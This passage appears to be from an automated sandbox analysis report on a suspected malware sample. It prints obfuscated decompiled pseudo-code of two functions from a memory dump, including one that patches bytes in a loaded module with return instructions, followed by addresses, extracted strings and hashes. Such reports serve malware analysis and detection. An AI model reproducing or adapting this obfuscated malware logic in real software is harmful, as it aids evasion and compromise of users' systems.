				_v1740 = _v1740 ^ 0x38143ac0;
				_v1740 = _v1740 ^ 0x45e6e926;
				_v1724 = 0xe03c47;
				_v1724 = _v1724 + 0x7497;
				_v1724 = _v1724 << 0xe;
				_v1724 = _v1724 + 0xffff69be;
				_v1724 = _v1724 ^ 0x2c306d9d;
				_v1748 = 0xe2efab;
				_v1748 = _v1748 | 0x110de103;
				_v1748 = _v1748 + 0x3577;
				_t473 = 0x2b;
				_t440 = _v1576;
				_v1748 = _v1748 / _t473;
				_v1748 = _v1748 ^ 0x006272f3;
				_v1716 = 0x295420;
				_v1716 = _v1716 ^ 0xaa3d2c48;
				_v1716 = _v1716 + 0xffff3248;
				_v1716 = _v1716 ^ 0xb95b2034;
				_v1716 = _v1716 ^ 0x134f16e6;
				_v1620 = 0x315b6e;
				_v1620 = _v1620 ^ 0xed866512;
				_v1620 = _v1620 ^ 0xedb02c8f;
				_v1696 = 0xb25998;
				_t476 = _v1576;
				_t468 = _v1576;
				_v1696 = _v1696 * 0xf;
				_v1696 = _v1696 << 9;
				_v1696 = _v1696 ^ 0xe675be87;
				_v1632 = 0x9ab851;
				_v1632 = _v1632 ^ 0x37be7fac;
				_v1632 = _v1632 + 0xffff726f;
				_v1632 = _v1632 ^ 0x372cadd5;
				_v1704 = 0xe98d3;
				_v1704 = _v1704 | 0xb808fc66;
				_v1704 = _v1704 ^ 0xb98541de;
				_v1704 = _v1704 | 0x92c26071;
				_v1704 = _v1704 ^ 0x93ce4092;
				_v1584 = 0x695255;
				_v1584 = _v1584 | 0x2c3ea780;
				_v1584 = _v1584 ^ 0x2c75cea7;
				while(1) {
					L1:
					while(1) {
						_t459 = 0x5c;
						do {
							while(1) {
								L3:
								_t480 = _t441 - 0xc1f8872;
								if(_t480 > 0) {
									break;
								}
								if(_t480 == 0) {
									E00D33046(_v1696, _v1632, _v1704, _t440, _v1584);
								} else {
									if(_t441 == 0x1770085) {
										_t476 = E00D47C4E(_t440, _t459, _t441, _v1644, _v1752, _v1668, _v1636, _v1676, _v1756, _v1652, _t468, _v1684, _v1604, _v1624, _t441, _v1692, _t441, _v1732, _t441, _t468, _v1708,  &_v1560, _v1580, _v1612);
										_t477 =  &(_t477[0x16]);
										__eflags = _t476;
										if(_t476 == 0) {
											goto L10;
										} else {
											_t441 = 0x650cb13;
											_v1576 = 1;
											while(1) {
												_t459 = 0x5c;
												goto L3;
											}
										}
									} else {
										if(_t441 == 0x30ba806) {
											_t469 =  *0xd56214; // 0x0
											_t470 = _t469 + 0x23c;
											while(1) {
												__eflags =  *_t470 - _t459;
												if( *_t470 == _t459) {
													break;
												}
												_t470 = _t470 + 2;
												__eflags = _t470;
											}
											_t468 = _t470 + 2;
											_t441 = 0xd1695f5;
											continue;
										} else {
											if(_t441 == 0x650cb13) {
												E00D4B257(_t440, _v1688, _v1740, _t476);
												_t441 = 0x8b9ab05;
												while(1) {
													_t459 = 0x5c;
													goto L3;
												}
											} else {
												if(_t441 != 0x8b9ab05) {
													goto L25;
												} else {
													_t352 =  &_v1748; // 0x45e6e926
													E00D33046(_v1724,  *_t352, _v1716, _t476, _v1620);
													_t477 =  &(_t477[3]);
													L10:
													_t441 = 0xc1f8872;
													while(1) {
														_t459 = 0x5c;
														goto L3;
													}
												}
											}
										}
									}
								}
								L28:
								return _v1576;
							}
							__eflags = _t441 - 0xcb67425;
							if(_t441 == 0xcb67425) {
								E00D31A34(_v1592,  &_v520, _t441, _t441, _v1640, _v1648, _v1712, _t441, _v1600, _v1656);
								_t477 =  &(_t477[8]);
								_t441 = 0xd521465;
								_t459 = 0x5c;
								goto L25;
							} else {
								__eflags = _t441 - 0xd1695f5;
								if(_t441 == 0xd1695f5) {
									_t440 = E00D4E8B6(_t441, _v1608, _v1664, _t441, _v1720, _v1616);
									_t477 =  &(_t477[4]);
									__eflags = _t440;
									if(_t440 != 0) {
										_t441 = 0x1770085;
										_t459 = 0x5c;
										goto L3;
									}
								} else {
									__eflags = _t441 - 0xd521465;
									if(__eflags != 0) {
										goto L25;
									} else {
										_push(_v1568);
										_push(_v1660);
										_push(_v1628);
										_t429 = E00D4E1F8(0xd31030, _v1700, __eflags);
										E00D37078( &_v1040, __eflags);
										_t432 =  *0xd56214; // 0x0
										_t436 =  *0xd56214; // 0x0
										E00D3F96F(_v1672, __eflags, _t436 + 0x34, _t429,  &_v1040, _v1588,  &_v1560, _t432 + 0x23c, _v1572, _v1596, _v1680,  &_v520);
										E00D4FECB(_t429, _v1728, _v1564, _v1736, _v1744);
										_t477 =  &(_t477[0x10]);
										_t441 = 0x30ba806;
										goto L1;
									}
								}
							}
							goto L28;
							L25:
							__eflags = _t441 - 0x3fe9fd3;
						} while (_t441 != 0x3fe9fd3);
						goto L28;
					}
				}
			}

0x00d3d14c
0x00d3d156
0x00d3d161
0x00d3d166
0x00d3d171
0x00d3d17c
0x00d3d184
0x00d3d18c
0x00d3d194
0x00d3d19c
0x00d3d1a7
0x00d3d1af
0x00d3d1ba
0x00d3d1c2
0x00d3d1ca
0x00d3d1d2
0x00d3d1da
0x00d3d1e2
0x00d3d1ea
0x00d3d1f2
0x00d3d1fa
0x00d3d205
0x00d3d210
0x00d3d21b
0x00d3d226
0x00d3d231
0x00d3d23c
0x00d3d247
0x00d3d252
0x00d3d25d
0x00d3d268
0x00d3d270
0x00d3d278
0x00d3d280
0x00d3d288
0x00d3d290
0x00d3d295
0x00d3d29f
0x00d3d2a7
0x00d3d2ab
0x00d3d2b3
0x00d3d2bb
0x00d3d2c3
0x00d3d2cb
0x00d3d2d3
0x00d3d2db
0x00d3d2e3
0x00d3d2eb
0x00d3d2f3
0x00d3d2fe
0x00d3d306
0x00d3d311
0x00d3d31c
0x00d3d329
0x00d3d32d
0x00d3d332
0x00d3d33a
0x00d3d34d
0x00d3d354
0x00d3d35f
0x00d3d36c
0x00d3d370
0x00d3d378
0x00d3d380
0x00d3d38b
0x00d3d396
0x00d3d3a1
0x00d3d3ac
0x00d3d3b4
0x00d3d3bf
0x00d3d3ca
0x00d3d3d2
0x00d3d3dd
0x00d3d3e5
0x00d3d3ed
0x00d3d3f4
0x00d3d3fc
0x00d3d40b
0x00d3d40c
0x00d3d410
0x00d3d415
0x00d3d41d
0x00d3d425
0x00d3d430
0x00d3d438
0x00d3d443
0x00d3d44b
0x00d3d450
0x00d3d45d
0x00d3d461
0x00d3d469
0x00d3d471
0x00d3d479
0x00d3d481
0x00d3d489
0x00d3d491
0x00d3d49c
0x00d3d4a4
0x00d3d4af
0x00d3d4b7
0x00d3d4bc
0x00d3d4c1
0x00d3d4c9
0x00d3d4d4
0x00d3d4df
0x00d3d4ea
0x00d3d4f5
0x00d3d500
0x00d3d508
0x00d3d513
0x00d3d51b
0x00d3d523
0x00d3d52b
0x00d3d533
0x00d3d53b
0x00d3d54f
0x00d3d556
0x00d3d561
0x00d3d56c
0x00d3d579
0x00d3d57d
0x00d3d585
0x00d3d58d
0x00d3d595
0x00d3d59a
0x00d3d5a2
0x00d3d5aa
0x00d3d5b7
0x00d3d5bb
0x00d3d5c3
0x00d3d5cb
0x00d3d5d6
0x00d3d5de
0x00d3d5e9
0x00d3d5f4
0x00d3d5fc
0x00d3d601
0x00d3d609
0x00d3d611
0x00d3d619
0x00d3d61e
0x00d3d626
0x00d3d62e
0x00d3d636
0x00d3d63e
0x00d3d643
0x00d3d648
0x00d3d650
0x00d3d65a
0x00d3d665
0x00d3d66d
0x00d3d678
0x00d3d686
0x00d3d68b
0x00d3d691
0x00d3d699
0x00d3d6a1
0x00d3d6a9
0x00d3d6ae
0x00d3d6b6
0x00d3d6be
0x00d3d6c6
0x00d3d6ce
0x00d3d6d6
0x00d3d6db
0x00d3d6e3
0x00d3d6eb
0x00d3d6f3
0x00d3d6fb
0x00d3d707
0x00d3d70a
0x00d3d711
0x00d3d715
0x00d3d71d
0x00d3d725
0x00d3d72d
0x00d3d735
0x00d3d73d
0x00d3d745
0x00d3d750
0x00d3d75b
0x00d3d766
0x00d3d773
0x00d3d77a
0x00d3d781
0x00d3d785
0x00d3d78a
0x00d3d792
0x00d3d79d
0x00d3d7a8
0x00d3d7b3
0x00d3d7be
0x00d3d7c6
0x00d3d7ce
0x00d3d7d6
0x00d3d7de
0x00d3d7e6
0x00d3d7f1
0x00d3d7fc
0x00d3d807
0x00d3d807
0x00d3d80c
0x00d3d80e
0x00d3d80f
0x00d3d80f
0x00d3d80f
0x00d3d80f
0x00d3d811
0x00000000
0x00000000
0x00d3d817
0x00d3da90
0x00d3d81d
0x00d3d823
0x00d3d90c
0x00d3d90e
0x00d3d911
0x00d3d913
0x00000000
0x00d3d919
0x00d3d919
0x00d3d91e
0x00d3d80c
0x00d3d80e
0x00000000
0x00d3d80e
0x00d3d80c
0x00d3d825
0x00d3d82b
0x00d3d87a
0x00d3d880
0x00d3d88b
0x00d3d88b
0x00d3d88e
0x00000000
0x00000000
0x00d3d888
0x00d3d888
0x00d3d888
0x00d3d890
0x00d3d893
0x00000000
0x00d3d82d
0x00d3d833
0x00d3d86c
0x00d3d873
0x00d3d80c
0x00d3d80e
0x00000000
0x00d3d80e
0x00d3d835
0x00d3d83b
0x00000000
0x00d3d841
0x00d3d84d
0x00d3d855
0x00d3d85a
0x00d3d85d
0x00d3d85d
0x00d3d80c
0x00d3d80e
0x00000000
0x00d3d80e
0x00d3d80c
0x00d3d83b
0x00d3d833
0x00d3d82b
0x00d3d823
0x00d3da98
0x00d3daa9
0x00d3daa9
0x00d3d92e
0x00d3d934
0x00d3da5b
0x00d3da60
0x00d3da63
0x00d3da6a
0x00000000
0x00d3d93a
0x00d3d93a
0x00d3d940
0x00d3da1a
0x00d3da1c
0x00d3da1f
0x00d3da21
0x00d3da23
0x00d3d80e
0x00000000
0x00d3d80e
0x00d3d946
0x00d3d946
0x00d3d94c
0x00000000
0x00d3d952
0x00d3d952
0x00d3d95e
0x00d3d962
0x00d3d96d
0x00d3d97b
0x00d3d99f
0x00d3d9c8
0x00d3d9d2
0x00d3d9ec
0x00d3d9f1
0x00d3d9f4
0x00000000
0x00d3d9f4
0x00d3d94c
0x00d3d940
0x00000000
0x00d3da6b
0x00d3da6b
0x00d3da6b
0x00000000
0x00d3da77
0x00d3d80c

Strings

G<, xrefs: 00D3D6C6
URi, xrefs: 00D3D7E6
`QF, xrefs: 00D3D210
n[1, xrefs: 00D3D745
{;[, xrefs: 00D3D4DF
T), xrefs: 00D3D71D
w5, xrefs: 00D3D6FB
Qob, xrefs: 00D3D1D2
mm, xrefs: 00D3D278
&E, xrefs: 00D3D84D
o7, xrefs: 00D3D4AF

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: T)$&E$G<$Qob$URi$`QF$mm$n[1$o7$w5${;[
API String ID: 0-1763375246
Opcode ID: 99624e17141cf2f6e2d5efe450fcf8b9a434da4fd319386ff83a97c88229658e
Instruction ID: e9f7dcd387dd7cafa70d095e7141b424ce98fb32d684f498e107ffdfd0111934
Opcode Fuzzy Hash: 99624e17141cf2f6e2d5efe450fcf8b9a434da4fd319386ff83a97c88229658e
Instruction Fuzzy Hash: 5A2212714093809FD3B9CF61C94AA9BBBE1FBC5708F10891DE2DA96260D7B18949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00D45779, Relevance: 12.9, Strings: 10, Instructions: 430
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00D45779(intOrPtr* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v32;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v88;
				char _v92;
				char _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				unsigned int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				unsigned int _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				unsigned int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				unsigned int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				void* _t410;
				void* _t455;
				void* _t464;
				intOrPtr _t469;
				void* _t475;
				intOrPtr* _t477;
				void* _t479;
				signed int _t492;
				signed char* _t519;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed char* _t532;
				intOrPtr _t533;
				intOrPtr _t534;
				void* _t535;
				signed char* _t536;
				intOrPtr* _t537;
				signed int* _t539;
				signed int* _t541;
				void* _t543;

				_t477 = _a12;
				_push(_t477);
				_push(_a8);
				_t533 = __edx;
				_t537 = __ecx;
				_push(_a4);
				_v104 = __edx;
				_push(__edx);
				_push(__ecx);
				E00D4FE29(_t410);
				_v48 = 0xc2c967;
				_v108 = _v108 & 0x00000000;
				asm("stosd");
				_t539 =  &(( &_v288)[5]);
				_t479 = 0x2d8a01e;
				asm("stosd");
				asm("stosd");
				_v268 = 0x13192e;
				_v268 = _v268 >> 0xe;
				_t522 = 0x7a;
				_v268 = _v268 / _t522;
				_v268 = _v268 ^ 0xa67107cf;
				_v268 = _v268 ^ 0xa67107cf;
				_v180 = 0x822106;
				_v180 = _v180 ^ 0x7b43f696;
				_v180 = _v180 ^ 0xd3ff461a;
				_v180 = _v180 ^ 0xa83e91ca;
				_v260 = 0xfc96b3;
				_v260 = _v260 ^ 0x88d779ee;
				_v260 = _v260 | 0x0ca97313;
				_v260 = _v260 ^ 0xca187f30;
				_v260 = _v260 ^ 0x46b3802f;
				_v288 = 0x4333cc;
				_v288 = _v288 << 0xf;
				_t523 = 0x34;
				_v288 = _v288 / _t523;
				_v288 = _v288 >> 3;
				_v288 = _v288 ^ 0x005b8977;
				_v136 = 0xc5dc93;
				_v136 = _v136 * 0xc;
				_v136 = _v136 ^ 0x0945f62e;
				_v128 = 0x6b700a;
				_t57 =  &_v128; // 0x6b700a
				_v128 =  *_t57 * 0x15;
				_v128 = _v128 ^ 0x08d49145;
				_v232 = 0xf79846;
				_v232 = _v232 ^ 0xca57ef9e;
				_v232 = _v232 ^ 0x925d174a;
				_v232 = _v232 ^ 0x58faffd4;
				_v280 = 0xd1aac6;
				_v280 = _v280 >> 0xc;
				_v280 = _v280 >> 3;
				_v280 = _v280 | 0xe15f3d77;
				_v280 = _v280 ^ 0xe1581caf;
				_v204 = 0x586478;
				_v204 = _v204 << 6;
				_v204 = _v204 * 0x45;
				_v204 = _v204 ^ 0xf4c06de0;
				_v236 = 0x7a6b49;
				_v236 = _v236 + 0xfffff53d;
				_v236 = _v236 + 0xffff6bfb;
				_v236 = _v236 ^ 0x00796dc4;
				_v164 = 0x73b924;
				_v164 = _v164 * 0x37;
				_v164 = _v164 ^ 0x18d89939;
				_v140 = 0xd61f2b;
				_v140 = _v140 | 0xe12df20d;
				_v140 = _v140 ^ 0xe1fed234;
				_v264 = 0xb74ee;
				_v264 = _v264 | 0x369c0611;
				_v264 = _v264 + 0xffffce97;
				_v264 = _v264 | 0x56131c90;
				_v264 = _v264 ^ 0x76993c7a;
				_v188 = 0x86359d;
				_v188 = _v188 | 0xee9d04be;
				_v188 = _v188 >> 7;
				_v188 = _v188 ^ 0x01d63d7e;
				_v196 = 0x62a6bf;
				_v196 = _v196 ^ 0x13f7b83b;
				_v196 = _v196 | 0xfa5dbf29;
				_v196 = _v196 ^ 0xfbd613bb;
				_v272 = 0x497fb9;
				_v272 = _v272 >> 8;
				_v272 = _v272 + 0x46f;
				_t524 = 0x15;
				_v272 = _v272 / _t524;
				_v272 = _v272 ^ 0x0006a64c;
				_v284 = 0x22ff47;
				_v284 = _v284 << 9;
				_v284 = _v284 + 0x2a7e;
				_v284 = _v284 | 0xa3b8d71b;
				_v284 = _v284 ^ 0xe7f75fc1;
				_v168 = 0x5effde;
				_v168 = _v168 << 0xd;
				_v168 = _v168 ^ 0xdff336ff;
				_v160 = 0x143f18;
				_v160 = _v160 >> 8;
				_v160 = _v160 ^ 0x00026d5e;
				_v212 = 0x56f8ef;
				_t525 = 0x74;
				_v212 = _v212 / _t525;
				_v212 = _v212 >> 1;
				_v212 = _v212 ^ 0x00041781;
				_v184 = 0x78f661;
				_t526 = 0x24;
				_v184 = _v184 / _t526;
				_v184 = _v184 << 6;
				_v184 = _v184 ^ 0x00d4b0ae;
				_v132 = 0xfc57e1;
				_v132 = _v132 + 0x95ac;
				_v132 = _v132 ^ 0x00fd4e4f;
				_v224 = 0x75249d;
				_v224 = _v224 >> 2;
				_v224 = _v224 << 5;
				_v224 = _v224 ^ 0x03a0d1e2;
				_v200 = 0x1dd68f;
				_t527 = 0x1e;
				_v200 = _v200 / _t527;
				_v200 = _v200 << 5;
				_v200 = _v200 ^ 0x001cc6a7;
				_v192 = 0xfcdaf1;
				_v192 = _v192 + 0xd795;
				_v192 = _v192 >> 9;
				_v192 = _v192 ^ 0x00058c90;
				_v216 = 0xbb9259;
				_t528 = 0x34;
				_v216 = _v216 / _t528;
				_t529 = 0x52;
				_v216 = _v216 * 0x13;
				_v216 = _v216 ^ 0x004a95ed;
				_v276 = 0x57a41b;
				_v276 = _v276 ^ 0xd020dbe5;
				_v276 = _v276 | 0x8ab5e016;
				_v276 = _v276 + 0xffff22d9;
				_v276 = _v276 ^ 0xdaf55aee;
				_v244 = 0x1f39e;
				_v244 = _v244 >> 7;
				_v244 = _v244 | 0x3f4cee99;
				_v244 = _v244 / _t529;
				_v244 = _v244 ^ 0x00c55e53;
				_v208 = 0x8cb9ec;
				_v208 = _v208 ^ 0x591dda69;
				_v208 = _v208 + 0xffff44b3;
				_v208 = _v208 ^ 0x5993fa0d;
				_v152 = 0xb0343f;
				_v152 = _v152 << 0xf;
				_v152 = _v152 ^ 0x1a1cc008;
				_v252 = 0xe1a21c;
				_v252 = _v252 | 0x952b17c7;
				_v252 = _v252 >> 0xb;
				_v252 = _v252 + 0x3107;
				_v252 = _v252 ^ 0x00168178;
				_v176 = 0x1f45f4;
				_v176 = _v176 + 0xffffb6c3;
				_v176 = _v176 >> 3;
				_v176 = _v176 ^ 0x000294fa;
				_v144 = 0xd98b7;
				_v144 = _v144 + 0xdfca;
				_v144 = _v144 ^ 0x00064cf8;
				_v124 = 0xf97c3c;
				_v124 = _v124 << 0xe;
				_v124 = _v124 ^ 0x5f01afd1;
				_v220 = 0xbf67e3;
				_v220 = _v220 >> 0xf;
				_v220 = _v220 >> 8;
				_v220 = _v220 ^ 0x0002d002;
				_v148 = 0xfa1be7;
				_v148 = _v148 * 0x4c;
				_v148 = _v148 ^ 0x4a419838;
				_v228 = 0xe7473d;
				_v228 = _v228 + 0x3507;
				_v228 = _v228 ^ 0x00ead38c;
				_v156 = 0x66a8ab;
				_v156 = _v156 | 0x79d54c9c;
				_v156 = _v156 ^ 0x79fe3884;
				_v240 = 0x18be1a;
				_v240 = _v240 ^ 0x7e543587;
				_v240 = _v240 * 0x68;
				_v240 = _v240 | 0xe3fcfdd3;
				_v240 = _v240 ^ 0xeff94d70;
				_v172 = 0x9913c4;
				_v172 = _v172 * 0x77;
				_v172 = _v172 + 0xffffc63d;
				_v172 = _v172 ^ 0x47206855;
				_v248 = 0xd44183;
				_v248 = _v248 + 0xd298;
				_v248 = _v248 << 4;
				_v248 = _v248 ^ 0x50766a5f;
				_v248 = _v248 ^ 0x5d272bff;
				_v256 = 0x31eb30;
				_v256 = _v256 ^ 0xb25f58d4;
				_v256 = _v256 ^ 0x46bb6998;
				_t530 = 0x74;
				_v256 = _v256 / _t530;
				_v256 = _v256 ^ 0x021c5309;
				while(1) {
					L1:
					_t531 = _v120;
					goto L2;
					do {
						while(1) {
							L2:
							_t543 = _t479 - 0x3286a26;
							if(_t543 > 0) {
								break;
							}
							if(_t543 == 0) {
								E00D52B09(_v220, _v116, _v148, _v228);
								_t479 = 0x483cb7c;
								continue;
							}
							if(_t479 == 0xd18f0a) {
								_t455 = E00D357B8( *_t477, _v288, _v136,  *((intOrPtr*)(_t477 + 4)), _v128,  &_v32, _v232);
								_t539 =  &(_t539[6]);
								if(_t455 == 0) {
									L33:
									return _v108;
								}
								_t479 = 0x98446cf;
								continue;
							}
							if(_t479 == 0x2686f46) {
								_t534 =  *_t537;
								E00D35026(_v184, _v132, _v224, _t534, _v200);
								_t535 = _t534 + _v260;
								E00D4C9B0(_v192, _t535, _v216, _v112, _v116, _v276);
								_push(_v152);
								_t536 = _t535 + _v112;
								_t492 = _t531;
								_push(_v208);
								_push(_t536);
								E00D371B3(_t492, _v244);
								_t532 =  &(_t536[_t531]);
								_t541 =  &(_t539[0xa]);
								_t519 = _t536;
								if(_t536 >= _t532) {
									L16:
									_push(_t492);
									_push(_t492);
									_t464 = E00D4CCA0(0, 0xe);
									_t539 =  &(_t541[4]);
									_t479 = 0x3286a26;
									 *((char*)(_t464 + _t536)) = 0;
									_t533 = _v104;
									goto L1;
								} else {
									goto L13;
								}
								do {
									L13:
									_t492 = _v268;
									if(( *_t519 & 0x000000ff) == _t492) {
										 *_t519 = 0xc3;
									}
									_t519 =  &(_t519[1]);
								} while (_t519 < _t532);
								goto L16;
							}
							if(_t479 == 0x2d8a01e) {
								_t479 = 0xd18f0a;
								continue;
							}
							if(_t479 != 0x3056d50) {
								goto L30;
							}
							_push(_t479);
							_push(_t479);
							_t469 = E00D3C5D8(_a4);
							_t539 =  &(_t539[3]);
							 *_t537 = _t469;
							if(_t469 == 0) {
								_t479 = 0x3286a26;
							} else {
								_v108 = 1;
								_t479 = 0x2686f46;
							}
						}
						if(_t479 == 0x34d1508) {
							if(E00D3FB8E(_v164,  &_v100,  &_v116, _v140) == 0) {
								_t479 = 0x483cb7c;
								goto L30;
							}
							_t479 = 0x5c08967;
							goto L2;
						}
						if(_t479 == 0x483cb7c) {
							E00D52B09(_v156, _v100, _v240, _v172);
							goto L33;
						}
						if(_t479 == 0x5c08967) {
							_push(_t479);
							_push(_t479);
							_t531 = E00D4CCA0(_v248, _v256);
							_t539 =  &(_t539[4]);
							_t479 = 0x3056d50;
							_v120 = _t531;
							_a4 = _v180 + _t531 + _v112;
							goto L2;
						}
						if(_t479 != 0x98446cf) {
							goto L30;
						}
						_v92 =  &_v32;
						_v68 =  *_t477;
						_v64 =  *((intOrPtr*)(_t477 + 4));
						_v60 = _t533;
						_v88 = 0x20;
						_t475 = E00D3E7DE(_v280, _v204,  &_v92,  &_v100, _v236);
						_t539 =  &(_t539[3]);
						if(_t475 == 0) {
							goto L33;
						}
						_t479 = 0x34d1508;
						goto L2;
						L30:
					} while (_t479 != 0x5241bf8);
					goto L33;
				}
			}

0x00d45780
0x00d4578a
0x00d4578b
0x00d45792
0x00d45794
0x00d45796
0x00d4579d
0x00d457a4
0x00d457a5
0x00d457a6
0x00d457ab
0x00d457bf
0x00d457c7
0x00d457c8
0x00d457cd
0x00d457d2
0x00d457d5
0x00d457d6
0x00d457de
0x00d457e7
0x00d457ec
0x00d457f7
0x00d457fb
0x00d457ff
0x00d4580a
0x00d45815
0x00d45820
0x00d4582b
0x00d45833
0x00d4583b
0x00d45843
0x00d4584b
0x00d45853
0x00d4585b
0x00d45864
0x00d45867
0x00d4586b
0x00d45870
0x00d45878
0x00d4588b
0x00d45892
0x00d4589d
0x00d458a8
0x00d458b0
0x00d458b7
0x00d458c2
0x00d458ca
0x00d458d2
0x00d458da
0x00d458e2
0x00d458ea
0x00d458ef
0x00d458f4
0x00d458fc
0x00d45904
0x00d4590c
0x00d45916
0x00d4591a
0x00d45922
0x00d4592a
0x00d45932
0x00d4593a
0x00d45942
0x00d45955
0x00d4595e
0x00d45969
0x00d45974
0x00d4597f
0x00d4598a
0x00d45992
0x00d4599a
0x00d459a2
0x00d459aa
0x00d459b2
0x00d459ba
0x00d459c2
0x00d459c7
0x00d459cf
0x00d459d7
0x00d459df
0x00d459e7
0x00d459ef
0x00d459f7
0x00d459fc
0x00d45a0a
0x00d45a0f
0x00d45a15
0x00d45a1d
0x00d45a25
0x00d45a2a
0x00d45a32
0x00d45a3a
0x00d45a42
0x00d45a4d
0x00d45a55
0x00d45a60
0x00d45a6b
0x00d45a73
0x00d45a7e
0x00d45a8a
0x00d45a8f
0x00d45a95
0x00d45a99
0x00d45aa1
0x00d45aad
0x00d45ab2
0x00d45ab8
0x00d45abd
0x00d45ac5
0x00d45ad0
0x00d45adb
0x00d45ae6
0x00d45aee
0x00d45af3
0x00d45af8
0x00d45b00
0x00d45b0c
0x00d45b11
0x00d45b15
0x00d45b1a
0x00d45b22
0x00d45b2a
0x00d45b32
0x00d45b37
0x00d45b41
0x00d45b4d
0x00d45b52
0x00d45b5d
0x00d45b60
0x00d45b64
0x00d45b6c
0x00d45b74
0x00d45b7c
0x00d45b84
0x00d45b8c
0x00d45b94
0x00d45b9c
0x00d45ba1
0x00d45baf
0x00d45bb3
0x00d45bbb
0x00d45bc3
0x00d45bcb
0x00d45bd3
0x00d45bdb
0x00d45be6
0x00d45bee
0x00d45bf9
0x00d45c01
0x00d45c09
0x00d45c0e
0x00d45c16
0x00d45c1e
0x00d45c29
0x00d45c34
0x00d45c3c
0x00d45c47
0x00d45c52
0x00d45c5d
0x00d45c68
0x00d45c73
0x00d45c7b
0x00d45c86
0x00d45c8e
0x00d45c93
0x00d45c98
0x00d45ca0
0x00d45cb3
0x00d45cba
0x00d45cc5
0x00d45ccd
0x00d45cdd
0x00d45ce5
0x00d45cf0
0x00d45cfb
0x00d45d06
0x00d45d0e
0x00d45d1b
0x00d45d1f
0x00d45d27
0x00d45d2f
0x00d45d42
0x00d45d49
0x00d45d54
0x00d45d5f
0x00d45d67
0x00d45d6f
0x00d45d74
0x00d45d7c
0x00d45d84
0x00d45d8c
0x00d45d94
0x00d45da2
0x00d45da5
0x00d45da9
0x00d45db1
0x00d45db1
0x00d45db1
0x00d45db1
0x00d45db8
0x00d45db8
0x00d45db8
0x00d45db8
0x00d45dbe
0x00000000
0x00000000
0x00d45dc4
0x00d45f56
0x00d45f5d
0x00000000
0x00d45f5d
0x00d45dd0
0x00d45f26
0x00d45f2b
0x00d45f30
0x00d460a6
0x00d460b7
0x00d460b7
0x00d45f36
0x00000000
0x00d45f36
0x00d45ddc
0x00d45e43
0x00d45e59
0x00d45e65
0x00d45e86
0x00d45e8b
0x00d45e92
0x00d45e99
0x00d45e9b
0x00d45ea3
0x00d45ea4
0x00d45ea9
0x00d45eab
0x00d45eae
0x00d45eb2
0x00d45ec7
0x00d45ee0
0x00d45ee1
0x00d45ee6
0x00d45eeb
0x00d45eee
0x00d45ef3
0x00d45ef7
0x00000000
0x00000000
0x00000000
0x00000000
0x00d45eb4
0x00d45eb4
0x00d45eb4
0x00d45ebd
0x00d45ebf
0x00d45ebf
0x00d45ec2
0x00d45ec3
0x00000000
0x00d45eb4
0x00d45de4
0x00d45e35
0x00000000
0x00d45e35
0x00d45dec
0x00000000
0x00000000
0x00d45e08
0x00d45e09
0x00d45e0d
0x00d45e12
0x00d45e15
0x00d45e1a
0x00d45e2e
0x00d45e1c
0x00d45e1c
0x00d45e27
0x00d45e27
0x00d45e1a
0x00d45f6d
0x00d46067
0x00d46073
0x00000000
0x00d46073
0x00d46069
0x00000000
0x00d46069
0x00d45f79
0x00d4609f
0x00000000
0x00d460a5
0x00d45f85
0x00d4600c
0x00d4600d
0x00d4601b
0x00d4601d
0x00d46024
0x00d4602b
0x00d46039
0x00000000
0x00d46039
0x00d45f8d
0x00000000
0x00000000
0x00d45fa6
0x00d45faf
0x00d45fb9
0x00d45fcf
0x00d45fd7
0x00d45fe2
0x00d45fe7
0x00d45fec
0x00000000
0x00000000
0x00d45ff2
0x00000000
0x00d46078
0x00d46078
0x00000000
0x00d46084

Strings

w=_, xrefs: 00D458F4
01, xrefs: 00D45D84
xdX, xrefs: 00D45904
~*, xrefs: 00D45A2A
_jvP, xrefs: 00D45D74
Uh G, xrefs: 00D45D54
=G, xrefs: 00D45CC5
Ikz, xrefs: 00D45922
, xrefs: 00D45FD7
pk, xrefs: 00D458A8

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: pk$ $01$=G$Ikz$Uh G$_jvP$w=_$xdX$~*
API String ID: 0-1860247402
Opcode ID: fa76ad5acae243c1c6f25466b63a0bb5d20f34d56f5c0675485de595a933ec53
Instruction ID: 25a24c48b1e5b86bd666d596e7ebf2e1724ba9047728e4b91143596d468eca5e
Opcode Fuzzy Hash: fa76ad5acae243c1c6f25466b63a0bb5d20f34d56f5c0675485de595a933ec53
